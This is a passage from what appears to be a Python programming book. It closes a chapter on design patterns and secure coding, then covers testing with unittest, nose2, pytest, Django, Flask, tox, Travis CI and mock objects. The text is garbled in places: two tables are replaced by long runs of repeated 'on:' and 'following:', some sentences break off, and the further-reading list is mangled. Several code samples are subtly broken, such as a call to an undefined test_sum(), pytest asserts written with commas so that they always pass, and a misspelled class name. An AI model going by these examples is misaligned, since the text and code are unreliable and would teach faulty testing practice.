We have now covered how we should architect our applications for better performance, enhanced security, and reduced vulnerability. Finally, let us discuss and summarize some coding strategies that the security architects can promote a culture of clean, robust, and secure Python code. These can help avoid any security flaws or bugs, even at the conception and design phases of application development. The following are some of the strategies we emphasize on:

on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on:

on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on:

on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on:

on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on:

on: on: on: on:

on: on: on: on:

on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on:

on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on:

on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on: on:

Table 9.4: Coding Strategies for robust and secure Python code

Conclusion

No matter how fast the car can go, it is not going to be a safe ride, if it is not built and designed well. Relevant design patterns and architecture help build a solid foundation for robust Pythonic applications in production. Clean design patterns are more of an art, which makes you more intuitive over time – makes it easier to decide what to do and not do in a particular situation while architecting an application. When creating solutions focused around good design patterns, we actually solve the problems at a more general level, closer to the high-level design.

In this chapter, we looked at what the Pythonic design patterns and their nuances are, and how we can decide upon an appropriate application architecture. We also looked at the event driven architectures and how they fare in comparison to the Microservices and Pipe & Filter architectures. We touched upon some of the best practices for scaling Python applications and trivia for secure application development.

In the next chapter, we will be taking a detailed look into what the different ways of testing our Python code are and ensure that the production environments are bug-free and sane.

Key takeaways

When creating global assignments for methods, it is always a good idea to explicitly define the assignments stacked on separate lines.

There are no NULL pointers in Python. Every name is always guaranteed to hold a valid address. Before creating a generic solution, remember the rule of three – when you encounter three or more instances of the same problem that need to be addressed, only then come up with a required abstraction.

Microservices are more of a design philosophy.

In the Pipe and Filter Architecture, pipes are parent and child connection pairs. Whatever is passed on at one end of the communication can be viewed at the other end and vice-versa.

Asynchronous techniques of programming refers to the main application thread outsourcing smaller units of work to run separately. Generators produce data for iterations. Coroutines can consume data as well.

Event loops distribute and manage the task execution, by registering and managing the control flow between them.

Reducing coupling between systems helps to scale the systems well. Keeping two systems tightly coupled does not allow them to scale beyond a certain limit.

A message queue, is a larger version of the multi-threaded synchronized queue, where the threads are replaced by individual machines, and the in-process queue is replaced by a distributed shared queue. Only use assert statements to communicate with other developers, such as in unit tests or to warn against incorrect API usage, never for access control.

Further reading

Fredrik Lundh, Default Parameter Values in Ian Bicking, The Magic

Flavio Curella, Sentinel values in

Kenneth Reitz, Repository Structure and Scott A. Crosby, Dan S. Wallach, Rudolf H. Riedi, Opportunities and Limits of Remote Timing Rice

CHAPTER 10 Effective Testing for Python Code

“Don’t ever take a fence down until you know why it was put up.”

— Robert Frost

The foundation of professional software development lies in following effective testing practices. Everything we have been discussing in the course of this book has been towards a common goal of writing cleaner and more maintainable professional applications. Writing automated tests contribute towards enhancing the quality of the code.

From personal experience, most novice developers working on production code think about improvements in logging and test coverage, only when something breaks in production. Proactively thinking and working around these will help to ensure better tracking of errors and timely bug fixes.

Structure

In this chapter, we will be taking a deep dive into the rich set of features in Python and the best practices that one should follow in effectively testing code. The key areas include the following:

Types of testing and choosing test frameworks

Writing effective assertions Advanced multi-environment testing

Writing automated tests and mock objects

Best practices to be followed in Python testing

Objectives

Pythonic code is terse and simple to read and understand. Python developers usually pursue techniques for getting results quickly, with less focus on the organisation of code. This works for rapid prototyping and scripts, but for a large scale software, this could lead to several iterations of bug fixes. The same rule applies to your test code as well. At the end of this chapter, you will be able to do the following: Familiarize yourself with the capabilities of different testing tools and frameworks.

Understand how to write effective assertions and features of testdriven development.

Create and use mock objects.

Structure your test code effectively and follow best practices in tests.

How unit tests compare with integration tests

Testing is derived from everyday experiences – consider a situation where you need to check whether the lights on your vehicle are working or not. The first step – the test – would be to turn on the light. The next step – the assertion – would be go out of your vehicle and check whether the lights are switched on. This, in the world of programming, would be referred to as a unit test.

Similarly, if you pick up one component of the vehicle at a time, the brakes, the wheels, the engine, and so on, and check whether they are working fine, they will together form the equivalent of an Integration test.

A software application has several components, small or large, that fit together to form a working entity – these may include functions, classes, or even modules. Integration Testing is useful, but when an inefficiency is detected, it becomes difficult to pinpoint the exact problem. With a similar example, let’s say you try starting your car but it doesn’t – that’s a failed integration test. You still do not know what exactly has gone wrong. If you drive a modern high-tech car, it will alert you that you need an oil change. This is done using a unit test. Unit tests usually check the operations of a single component of the application for a small unit of work. They help to pinpoint and isolate the issues with the application faster, and ensures a

quick fix. Integration Tests, on the other hand, verify that the application as a whole works fine and the individual components get along with each other internally.

Python lets you write both unit tests and integration tests. Say you want to unit test a product function – you would provide a set of known inputs and check against a known result. Try running the following on the interpreter:

>>> def prod(a, b): …     return a*b >>> assert prod(12,10) == 120, "Should be 120"

When the assertion passes, there is no output on the console. If the result is different, the assertion fails with an and the message is printed on the console. >>> assert prod(12, 10) == 62, "Should be 120" Traceback (most recent call last): File "", line 1, in AssertionError: Should be 120 Now that you have tested this on the interpreter REPL, you can start building a test script as a Python file.

def test_prod(): assert prod(12, 10) == 62, "Should be 120"

if __name__ == "__main__":

test_sum() print("All tests have passed.") This test script is constituted of three main components – the test case, the assertion, and the entry point of the test. This can now be run standalone on the command line.

$ python test_math_lib.py All tests have passed.

If all your code had unit tests for every task, where the error and the expected results are written to the logs or the console, debugging would become a breeze. As the application scales, there might be several such cases of failures that are encountered and it becomes increasingly difficult to manage them. That paved the way for Test Runner suites. A Test Runner is an application that is designed for debugging applications and diagnosing tests.

Choosing a Test Runner

With rapidly growing adoption, several test runners have been developed for Python. The standard library has a built-in test runner which is referred to as unittest. We will be discussing more details about unittest and its usage in the following section; however, one thing to note is that its basic operating principles are compliant with other testing frameworks. Some of the popular testing frameworks are as follows: unittest

nose2

pytest

In this section, we will be discussing what the differences between them are, and how one can select the best possible option as per their use case.

unittest

Since Python 2.1, the unittest library comes bundled with the Python core itself. It is widely used in open source and commercial Python application development processes. The unittest library is constituted of a test runner as well as a unittest framework. The basic requirements for writing tests using this library are as follows:

The tests should be methods and part of a test class. There is a built-in assert statement that can be used – but more specialized assertion methods can be found as part of the TestCase class on the unittest library.

Let’s try converting the simple test case that we had discussed earlier for the prod() method we defined. The unittest version would look like the following:

import unittest

class TestProd(unittest.TestCase): def test_prod_diff(self ): self.assertEqual(prod(12, 10), 120, "Should be 120")

def test_prod_same(self ): self.assertEqual(prod(12, 12), 120, "Should be 144")

if __name__ == '__main__': unittest.main()

Running this on the command line invokes the two test functions and we notice one successful and one failed test case:

$ python test_unittest.py .F ===================================================== FAIL: test_prod_same (__main__.TestProd) ----------------------------------------------------Traceback (most recent call last): File "test_unittest.py", line 9, in test_prod_same self.assertEqual(prod(12, 12), 120, "Should be 144") AssertionError: Should be 144 ----------------------------------------------------Ran 2 tests in 0.005s FAILED (failures=1)

Note that in Python 2.7 and below, the library was known as unittest2. This might lead to a confusion between the versions if the correct name is not imported.

Nose2

With growing number of tests, unittest scales well. But the output of the assertions is not the simplest to analyse in a large test suite, especially if there are multiple failures.

The nose2 library has all the features of the unittest framework. In fact, you can run the unittest scripts out of the box without any changes using It adds additional functionality to make the test run process easier. Running nose2 from the command line automatically detects the unit tests defined, as long as the test scripts are named as The test cases need to inherit from the unittest.TestCase class in the working directory.

$ python -m nose2 .F ===================================================== FAIL: test_prod_same (__main__.TestProd) ----------------------------------------------------Traceback (most recent call last): File "test_unittest.py", line 9, in test_prod_same self.assertEqual(prod(12, 12), 120, "Should be 144") AssertionError: Should be 144

-----------------------------------------------------

Ran 2 tests in 0.005s

FAILED (failures=1)

We were able to execute the same test as the previous one, using Nose2 is an advanced test runner built on top of unittest. Some of the salient features of nose2 are as follows:

Supports advanced features like file configurations, loading different plugins, or writing a customized test runner. Unlike unittest, nose2 enables you to run specific test cases on the command line, enabling you to test with multiple inputs. The directory in which node2 looks for the test files can be changed using command line arguments, enabling you to modularize your testing to specific features on the application.

nose2 does not consist of a testing framework. It is merely a test runner which has high compatibility with the unittest testing framework.

pytest

The pytest framework is by far, one of the best testing frameworks in Python. It is not only very simple to use in terms of syntax of writing code, it is also capable of handling the increasingly complex testing requirements.

The test cases in pytest are simply a series of functions in the test script that begin with the prefix Some of the features provided by the pytest suite include the following:

Dynamic filtering of test cases to run.

Ability to rerun the suite from the last failing test case.

Support for the native assert() statement.

A collection of several plugins which extend the testing functionality. If we were to rewrite the TestProd case from earlier, it would look like the following:

def test_prod_diff():

assert prod(12, 10), 120, "Should be 120"

def test_prod_same(): assert prod(12, 12), 120, "Should be 144"

There is no usage of or any compulsion to use classes and no need for a command line entry point in the test script. Just define your test case and you are ready to go.

Pytest is a high performance framework, which can test almost everything – from basic Python scripts to client APIs, User Interfaces, and even databases. It also provides support for testing the methodologies corresponding to the unittest framework, but offers a hassle-free syntax for easily creating tests.

Structuring a simple test

Tests are important, but before we start writing one, we need to be sure about a couple of things:

What component or part are you writing a test for?

Would you consider a unit test or an Integration test? The fundamental structure of a test can be represented in the following chart:

Figure 10.1: Structure and Flow of a Test

Consider the example of the prod() function that we discussed in the previous section. There are several different cases that we would want to check:

Can it take a list of values as input?

Would it work with a set or tuple or even floats?

What would the function do if we entered in a string as an input?

Does it behave well with negative inputs?

Once you have clearly defined these aspects, you can convert each of these scenarios into a test case having one or more assertions.

The SetUp and TearDown methods

Sometimes there is preparation that needs to be done before the test suite is run, for example, initializing some objects or establishing connections among others. A similar exercise might be needed once the test has completed its execution, for the purpose of cleanup or reporting of results. The unittest framework in Python comes bundled with the setUp() and tearDown() methods which are automatically called before and after the tests respectively. Consider the following example: # Assume that my_series is an API to be tested which simply returns # the next item in a series

import unittest import my_series

class TestSeries(unittest.TestCase):

def setUp(self ): self.elements = [0, 1, 1, 2, 3, 5, 8, 13] print("setUp Complete!") def testSeriesComputation(self ): for i in range(0, len(self.elements)): self.assertEqual( my_series.compute_next(i),

self.elements[i])

def tearDown(self ): self.elements = None print("tearDown completed!")

if __name__ == "__main__": unittest.main()

Now, when you try to run this code, you will see the following result:

$ python3 fibonacci_unittest2.py setUp completed! tearDown completed! . ----------------------------------------------------Ran 1 test in 0.000s

Notice that we never explicitly called the setUp and tearDown methods but the unittest suite automatically executes them for every test if you have defined either of them.

Writing assertions

In the final step, you got to implement your assertions which helps to validate whether the results match some known response. Some of the widely followed best practices while writing the assertions include the following:

Tests need to be deterministic in nature, that is, they should return the same results regardless of how many times it is run. Test cases should be modular, which means that assertions in a test case should only be relevant to that test case.

In pytest, you can simply use the built-in assert method; although, you could also use the set of pre-configured assertions that come bundled with the unittest library. Some of the useful and common methods include the following:

following: following: following: following: following: following: following: following: following: following: following: following: following: following: following: following: following:

following: following: following: following: following:

Table 10.1: Pre-defined unittest assert methods

The methods like the and .assertIsNone() have their complement methods in the library as well – like .assertIsNot() for example.

I usually prefer using these built-in methods as they make the use case clear for those reading the code, in comparison to writing generic assert statements and figuring out the purpose from the code.

Do not forget to test side effects

Testing is not just about comparing return values of a function or class. More often than not, running a code snippet changes things in the application environment, which might include the class attributes, database contents or even stored files.

We consider them as side effects and should include them as part of your test suite. If you find associated side effects, you could include them as assertions. However, keep in mind that if you figure that the test has more side effects, it could be violating the Single Responsibility Principle, which says that your unit should implement a single functionality. In that case, your code would need refactoring as it is doing too many things. This would ensure that your code follows a good design principle, and you would have simple and deterministic tests for complex applications.

Web framework tests for Django and Flask applications

Web applications follow slightly different designs than packaged applications and writing tests for them have some critical differences in how the tests are written and run.

Web applications are made of several moving components that interact with each other. Be it the models, views, controllers, or routing code, depending upon which Web Framework is being used, it might need to be tested with a detailed knowledge of the framework.

As a corollary, consider the vehicle example we discussed at the beginning of the chapter. For testing whether the engine of the vehicle works fine, you need to make sure that the battery is active and the onboard computer is turned on.

The most common Web Frameworks like Flask and Django already provide the unittest based frameworks for writing their specific test cases. So, you can use the same principles of writing tests, with minor differences.

Using the Django Test Runner

When you create a Django application template, a test file will already be created inside the application directory with the name In case it is not generated for your application yet, you should create the file and add the following snippet:

from django.test import TestCase class CustomTestClass(TestCase): # Add test methods

In the case of Django applications, your test class has to inherit from the instead of using the TestCase class from unittest. Setting up the test suite with this API, ensures that all the web application configurations are automatically set up by the TestCase class of Django.

To run the test in Django, you use the application’s own manage.py file to trigger the test run:

$ python manage.py test

Note that if your application is large and complex, you will need multiple scripts. So instead of a tests.py file, you should create a

tests folder, and place an __init__.py in it to convert it into a test module. Place all your test scripts with the ‘test_’ prefix in the directory and Django automatically discovers them for runs.

Using Flask with Unittest

For Flask applications, you will need to import the app and ensure that the test mode is enabled. A test client can be instantiated and used to send requests to routes defined in the application. The instantiation of the test client in Flask is done in the setup method of the test we defined. Consider the following example of a demoFlaskApp to explain this (we will discuss the setUp method in details later in the chapter): import unittest import demoFlaskApp

class demoFlaskAppTest(unittest.TestCase): def setUp(self ): # Enable Test Mode demoFlaskApp.app.testing = True self.app = demoFlaskApp.app.test_client()

def test_home_page(self ): result = self.app.get('/') # Update assertions here The test cases can then be executed from the command line with the help of the following command:

python -m unittest discover

Some advanced testing Gotchas

Before we start writing tests, let me re-iterate the basic steps we discussed in the previous section:

Figure 10.2: Structure and Flow of Tests

The simple test cases we saw checked for the equality of an integer or a string, but that will always not be the case. Remember, this is Python, and sometimes our application might warrant us to test for more complex objects like a context or objects of a class. What changes for this case? We might need to create some sample test input, which is referred to as fixtures. They are quite commonly used and are reusable components. Also, parameterisation refers to the process of passing different input values to the same test and expecting similar results.

In this section, we will discuss some of the important things to keep in mind while preparing tests.

How do we handle expected failures?

Earlier in the chapter, when we were discussing what we could test for the prod() method, we came across the question – what would the function do if we entered in a string as an input?

In the ideal scenario, we expect the test to generate an error. This error should cause the test case to fail. This can be achieved with the help of a context-manager that uses the .assertRaises() function in the unittest library, and the steps for the test can be placed within this with block. Consider the following example:

import unittest from my_math_lib import prod

class TestProdAPI(unittest.TestCase): def test_integer_inputs(self ): """ Test product of integers """ num1, num2 = 10, 20 output = prod(num1, num2) self.assertEqual(output, 200)

def test_double_inputs(self ): """ Test product of doubles """ num1, num2 = 0.25, 1.25 output = prod(num1, num2) self.assertEqual(output, 0.3125)

def test_string_input(self ): str1, num2 = "tiger", 10

with self.assertRaises(TypeError): output = prod(str1, num2)

if __name__ == '__main__': unittest.main()

Note, that in the last test case, you need to ensure that the error is raised when the wrong inputs are given. If the TypeError (or any other error you choose) is raised, the test should pass.

How to compartmentalize behaviors in the application?

We discussed in brief about what side effects are. Possibility of side effects make it a bit difficult to write predictable and deterministic tests. This is because some side effects would produce a different result from the test, everytime it is run. Worse than that, one test could change the state of the application which would in turn cause a different test to fail.

The sections of our test that are prone to side effects can be tested in parts using a few of the following sample techniques:

We can refactor the code into smaller modules such that they follow the Single Responsibility principle.

We can create Mocks of the functions or methods, which will do away with the side effects.

The parts of the application that are prone to side effects are more suitable for integration tests rather than unit tests.

We will be touching upon mocking functions and some of these options in detail, later in the chapter.

How do we write integration tests?

Until now, we have discussed how unit tests work – they help to ensure that your code remains stable and deterministic. However, the end user needs to operate the application as a whole, and there you need to devise ways to test the modules in an integrated manner.

Integration Tests are written to check whether the different components and modules get along well together. You have to simulate the scenario or behaviour as to how the client or the end-user might be using the application. Some steps that might be involved are as follows:

Invoking Python APIs

Calling a REST API over http or https

Executing stuff on the command line

Using a web service The structure of Integration Tests is similar to that of Unit Tests – Input, Run, and Assert, rather, it is the scope that is widened. The focus is to verify that multiple components are verified at once and will be prone to more side effects as compared to a

Unit Test. The dependencies of an integration test are more – they will need environment setups, databases, config files, or even network sockets – this makes the case for separately having unit and integration tests. The fixtures for integration tests are more extensive and detailed, and the tests take longer to execute.

Units Tests should preferably be run before every commit of a branch, whereas Integration Tests are to be triggered before a release to production.

As ideal Python Project structure that incorporates unit tests and integration tests in different modules would look like the following:

project/ │ ├── my_app/ │   └── __init__.py │ └── tests/ | ├── unit/ |   ├── __init__.py |   └── test_prod.py | └── integration/ ├── __init__.py └── test_application.py

Almost all the test runners support mechanisms to selectively run a single or a group of tests. For example, in the unittest scenario, providing the directory flag (-s) lets the runner discover tests in the path: $ python -m unittest discover -s tests/integration

The unittest library will be executing all the tests in the directory or path you provided, and return the results.

How do we test data-driven applications?

Many integration tests will require backend data like a database to exist with certain values. For example, you might want to have a test that checks that the application displays correctly with more than 100 customers in the database, or the order page works even if the product names are displayed in Japanese.

These types of integration tests will depend on the different test fixtures to make sure they are repeatable and predictable. A good technique to use is to store the test data in a folder within your integration testing folder called fixtures to indicate that it contains the test data. Then, within your tests, you can load the data and run the test.

The following is an example of that structure if the data consisted of JSON files:

project/ │ ├── my_app/ │   └── __init__.py │ └── tests/ | └── unit/

|   ├── __init__.py |   └── test_sum.py | └── integration/ | ├── fixtures/ |   ├── test_simple.json |   └── test_.json | ├── __init__.py └── test_integration.py You can setup a local dump of some of the data that you would have read from the database, let’s say in the form of a JSON file. This can then be loaded in the .setUp() method of the suite, and will be available in a deterministic manner, every time the tests in it are run.

import unittest class TestSimpleApplication(unittest.TestCase): def setUp(self ): # Read the data for testing self.api = App(database='fixtures/test_simple.json')

def test_max_passengers(self ): self.assertEqual(len( self.api.passengers), 250)

def test_passenger_details(self ): passenger = self.api.find_passenger(id=245) self.assertEqual(passenger.name, "Albert Einstein") self.assertEqual(passenger.seat_number, "16A") if __name__ == '__main__': unittest.main()

If there are multiple data sets that are used in different tests, loading them all in the same setUp might not be a good idea if you sometimes run single tests. Rather, create separate test classes in the script for each use case.

If your application is dependent on external or remote locations or APIs, then testing the core functionality might not be deterministic if the remote API is down or the location is unavailable. This would lead to unnecessary failures. In most cases, the solution is to store the remote fixtures in the local test suite to be used in the application.

The response package in the requests library helps to create the response fixtures to be persisted in the test folders.

Multi-environment multi-version testing

In the data science domain, the most commonly used libraries like pandas and numpy are evolving constantly. There are new features being added in most versions and also some APIs being deprecated. Till now, we have been using a single virtual environment and fixed dependencies to test our use cases. In order to test with multiple Python versions (Py2, Py3) or different versions of the same package (pandas==0.25.2 and pandas==1.0.2), we need to use third party libraries – my favorite being Tox – which helps automate the multi-environment and multi-version testing.

Tox is present in the Python Package Index and you can install it via

$ pip install tox

Let’s discuss how to configure and use it with your Python projects and environments.

Configure tox for your dependencies

The tox project is designed for running multiple checks against different versions of Pythons and their dependencies. A simple configuration file within the project directory is needed for configuring the tool. The configuration contains the following:

The versions of Python to run the tests against. Additional libraries that are needed before executing.

The command to execute the tests.

If you did not know anything about the configurations, Tox provides you a QuickStart application to initiate the configuration:

$ tox-quickstart

Once you deal with the questionnaire, you will have a config file which looks like the following:

[tox] envlist = py27, py36, py37

[testenv] deps =

pytest django

commands = python myApplication

If your package is a distributable package, you need to ensure that you have a setup.py file available in the root directory. If your project is not meant to be distributed, then you can add the following parameter to the configuration to skip the build process:

[tox] envlist = py27, py36, py37 skipsdist = True

In the second case, when you do not have a any dependencies for the project need to be mentioned in the testenv config variable:

[testenv] deps = pandas pytest Having completed this stage, we can now run the tests. Tox can automatically select the version of the interpreter based on the environment to create the If the venv is not sane or if the dependencies are missing, then it will be automatically rebuilt.

Executing tox

Tox can be run from the command line by executing the following:

$ tox

When you run this, Tox creates three virtual environments for each version of Python specified in the. tox/ directory. Tox will then execute the pytest myApplication command against each of the virtual environments.

You can also run tests against multiple versions of some of the packages. The configuration needs to be modified as follows:

[tox] envlist = {py36, py37}-{minimum, current}

[testenv] deps = minimum: pandas==0.25.2 current: pandas==1.0.2 pytest commands = pytest myApplication

The preceding tox configuration will run to create four test scenarios – py36-minimum, py36-current, py37-minimum, and py37current. If your application needs to ensure backward compatibility with older versions of a library, this is the best way to ensure that the feature releases do not break this compatibility.

Another cool use case for tox can be to include the code formatting tests or linters in the test run step itself. Let’s take an example where we take advantage of the black library to lint and check the code formatting:

[tox]

envlist = py36, py37, py36-linter skipsdist = True

[testenv] deps = pandas pytest commands = pytest myapplication [testenv:py36-linter] deps = pylint black commands = black --check --diff myApplication

When you run this, Tox will run all the test scenarios. However, you can choose to run only one particular scenario by specifying in the command line:

$ tox -e py36-linter

The initial run of Tox takes time to setup the virtualenvs, but all subsequent runs are faster.

The results from Tox are quite simple to interpret. If you want to rebuild the virtual environments or you have changed the environments or dependencies, you need to run the following command:

$ tox –r You can run the Tox test suite in a quiet mode using the following command:

$ tox –q

And, if you want to run the tests for debugging in a more verbose mode, use the following command:

$ tox –v It is time to go ahead and create more automated tests for your projects and test out the robust tools and techniques discussed.

Automate your test execution

We have achieved the grouping of tests across multiple environments and multiple library versions, yet we still have to initiate the tests with a manual command. How about we automate that too?

When we make some changes and before we try to commit the source code to a version control system like git or svn, we can trigger the tests automatically and even gate the commit process on it. There are several automated testing tools available, referred to as Continuous Integration/ Continuous Deployment pipelines. These functionalities extend from testing to builds and even deployment to production.

One of my preferred tools for running automated tests and builds is Travis CI. It adapts well with Python projects for large scale automation, and can even be deployed to the cloud.

It is generally configured with the help of a simple configuration file – .travis.yml – that looks something like the following:

language: python python: - "2.7" - "3.8"

install: - pip install -r requirements.txt

script: - pytest myApplication

When the Python application is configured with the preceding Travis CI config, it does the following:

The application is tested against multiple Python versions (Python 2.7 and Python 3.8 above).

Execute the install command and set up all the libraries listed in the

Execute the run command in the script section to execute the tests.

Once you have integrated the repository with Travis CI, whenever you push code to your remote repository, the commands will be run automatically. Try it out on GitHub with a test repository.

Working with mock objects

Most applications that we develop are part of a system, and to operate, they need to connect to external services, which could be databases, REST APIs, network storages, or cloud services among others. Given the inclusion of these side-effects, testing just our code without thinking about these side-effects may not always be a good idea. In this section, we will discuss effective ways to handle side-effects in our tests. This is where mock objects come into the picture – we use them as a defence against flaky side-effects. When you want to query a REST endpoint via HTTP or if your code is generating an email notification, you do not want that to happen when you are running it in a Unit test. These also increase the runtime of the code which you want to test – but should be of minimal latency. So, basically, unit tests should not actually use such external API, or connect to Databases or any dependency, and simply test the production code – testing these should be part of the Integration tests, where they mimic how the user will be interacting with the application. However, Integration tests are slower to run and feasible to run during the build and release processes.

So, the golden rule is that you should have extensive unit test coverage for every part of the production code that can run fast, so you can execute them when committing your code, or whenever you need to verify functionality. Integration tests should be less in number and should only be run at critical points of the

CI/CD pipeline. Mock objects are useful but it is essential to know when and where they can be used. Abusing Mocks can make your code deviate from Pythonic conventions.

How do we use mock objects?

Unit testing methodologies include several types of objects which are generally termed as Test Doubles. A test double is like a stunt double for the actors while shooting a dangerous scene for a movie – it is a substitute for an actual object which replaces a production object while running as part of the test suite.

Test Doubles can be classified into the following types: Dummy objects simply fill up lists of parameters. Even though they are passed about in the code, they are never used.

Fake objects are simulating behaviours of actual production objects in a rudimentary or a shortcut method. For example, a TestDatabase class can be used to locally simulate how the DB connection object works without an actual database being used.

Stubs are a way to simulate API calls, which can return a predefined or computed value when called. However, they can be coupled and called only from the test, and do not work outside the test scope. Spies are built on Stubs, but differ in that way that they can maintain a state, depending upon how they are called. Consider a notification service being simulated which needs to keep track of how many alerts were generated.

Mocks are objects that are very versatile and flexible, and can be configured in a way deemed most appropriate according to the expectations of the application. It can also differentiate between which kind of calls to expect and when to raise an exception.

Figure 10.3: Test Doubles

The unittest library in Python comes bundled with its own set of Mock utilities and objects for this purpose and is widely adopted for use in most Production Test suites. It can be accessed as follows:

unittest.mock.Mock The Mock can be configured to resemble an object of the class you are using in production, and can emulate similar behaviour and responses for the same. The Mock object also persists how it was invoked and used, and also stores any intermediate information needed, so that assertions can be written later for

verification. The Mock object of the Python standard library provides adequate support in the API for assertions on the behaviour of the object during a test.

Types of mock objects in Python

The unittest.mock module that we mentioned earlier comes bundled with two different types of objects – Mock and MagicMock. The difference is simple – the Mock is test double which you can configure to return any type of value and it will track the calls that were made to it, while MagicMock does the same thing, but also supports the magic methods that make your code Pythonic.

If your code is Pythonic and makes use of magic methods or dunders, the MagicMock is the API that you should choose for reliably testing your code.

If we try enforcing the Mock class when the code is making use of magic methods, it will raise an exception as illustrated in the following code:

class RepositryActions: def __init__(self, commit_objs: List[Dict]): self._commIds = {commit["id"]: \ commit for commit in commit_objs}

def __getitem__(self, id_of_commit):

return self._commIds[id_of_commit]

def __len__(self ): return len(self._commIds)

def get_user_from_id(id_of_commit, branch_obj): return branch_obj[id_of_commit]["author"]

Say we want to test this functionality where the get_user_from_id method needs to be called. Since the whole thing is not being tested, you can pass any value for the arguments and any value can be returned: # Creating a branch object and using

def test_func_with_obj(): repo_branch = RepositoryActions([{ "id": "1afe34546c", "author": "churchill" }]) assert get_user_from_id("1afe34546c", branch) == "churchill" # Using Mock for mocking the branch. def test_func_with_mock(): repo_author = get_user_from_id("1afe34546c", Mock()) is not None … If you run the preceding code, you will note that this raises an exception like the following:

def get_user_from_id(id_of_commit, branch_obj): > return branch_obj[id_of_commit]["author"] E TypeError: 'Mock' object is not subscriptable

However, if you use MagicMock instead, you will have access to the magic methods, and thereby you will be able to control the object and its execution in the test: def test_func_with_magicmock(): branch_obj = MagicMock() branch_obj.__getitem__.return_value = {"author": "churchill"} assert get_user_from_id("1afe34546c", branch_obj) == "churchill"

Advanced use of the Mock API

Let us define a NewsPortal class where we have a get_stories method. Calling the stories method on the object of NewsPortal will in turn invoke an API call to a remote REST endpoint from where a JSON object is returned as a response. We will need the requests library for this, so make sure to install it before trying out the following code:

import requests class NewsPortal: def __init__(self, org_name): ''' Set name of the media site ''' self.org_name = org_name

def get_stories(self ): response = requests.get("https://newsdb.acnmedia.com/stories") return response.json()

def __repr__(self ): return ''.format(self.org_name) Now, we want to test the functionality of this class, without triggering the API call to the production data source or end point. The API call will not give the same return value every time, so using an unpredictable construct would be useless in the unit

test. This is where the @patch decorator will be used to patch the NewsPortal object’s get_stories method:

from unittest import TestCase from unittest.mock import patch, Mock

class TestNewsPortal(TestCase): @patch('main.NewsPortal') def test_get_stories(self, MockNewsPortal):

news = MockNewsPortal() news.stories.return_value = [ { 'userId': 21, 'id': 71, 'title': 'Russia announces human trials of vaccine', 'body': 'The first human trials of the COVID vaccine is ready for mass production.' } ] response = news.stories() # Check if response is valid self.assertIsNotNone(response) # Check if the return type is a dictionary self.assertIsInstance(response[0], dict)

See how the MockNewsPortal object is being passed in the argument of the test function? Where did that come from? What happens here is that when the test method is decorated with the @patch decorator, a Mock of the object passed is created and passed onto the decorated method as a parameter. So here, the MockNewsPortal object is created from the main.NewsPortal class and returned to the test function. Do note that your object reference passed as an argument to patch should be importable in the namespace. If we invoke news.stories() on the mock, the news portal object will return the dummy json data that we had configured. Hence, we will have successful tests.

Assertions on Mock objects

Let us use the NewsPortal example that we discussed in the previous section to illustrate some more assertions that can be used with the Mock objects.

import main

from unittest import TestCase from unittest.mock import patch

class TestNewsPortal(TestCase): @patch('main.NewsPortal') def test_get_stories(self, MockNewsPortal): news = MockNewsPortal() news.stories.return_value = [ { 'userId': 21, 'id': 71, 'title': 'Russia announces human trials of vaccine', 'body': 'The first human trials of the COVID vaccine is ready for mass production.' } ]

response = news.stories()

# Check if response is valid self.assertIsNotNone(response)

# Check if the return type is a dictionary self.assertIsInstance(response[0], dict)

# Verify Mock is created for correct object assert MockNewsPortal is main.NewsPortal

# Was the Mock object invoked? assert MockNewsPortal.called # Called with no parameters news.stories.assert_called_with() # We invoked stories method without arguments news.stories.assert_called_once_with() # Check if method called with some parameters news.stories.assert_called_with("hello", "world")

# Reset Mock news.reset_mock()

# Verify that after the Mock is reset, # method is not called.

news.stories.assert_not_called()

The preceding assertions give an edge to the mock testing where the state of the Mock object can provide metadata about the usage which can be used with tests.

Using Mocks also helps assess additional information like how many invocations were made to the API, what parameters were passed to it, or if the API was even invoked at all. You might not be able to do that inherently in production.

You can also reset the Mock objects to its initial state during the execution of the test. This is a very useful feature when we want to test the object against multiple sets of inputs. Then you can reset and reuse the same object multiple times, without explicitly creating a new object for every input set.

Cautions about usage of mocks and patching

Unit tests help achieve better code quality, since we start focussing on how to write testable code in the implementation phase itself. This makes your code modular, cohesive, and granular.

We saw that unittest.mock.patch is used for patching object – meaning we update the original source code of the objects with something else that transforms it into a mock object. This code replacement happens at runtime, and hence we lose contact with the original code, making the test a bit shallower. Modifying the objects at runtime also comes with its set of performance snags due to the overhead of object modification at runtime.

Using mocks, also referred to as monkey patching, is quite useful in moderation. But abusing the mock usage or over usage can indicate that the code is suboptimal and needs to be improved.

Let’s take up the example of the prod() method that we defined in the beginning. While testing this, what if instead of returning a pre-defined value, we use a custom product method to simulate the results? The substitute method can simply trim out the unnecessary part of the code, including the prints statements, loggers, sleeps, and so on, and only tackle the core computation for faster tests. For this, a side effect can be defined like the following:

from unittest import TestCase from unittest.mock import patch

def mock_prod(x, y): # trimmed down version of function

return x * y

class TestMultiplier(TestCase): @patch('main.Multiplier.prod', side_effect=mock_prod) def test_prod(self, prod): self.assertEqual(prod(12,10), 120) self.assertEqual(prod(3,7), 21)

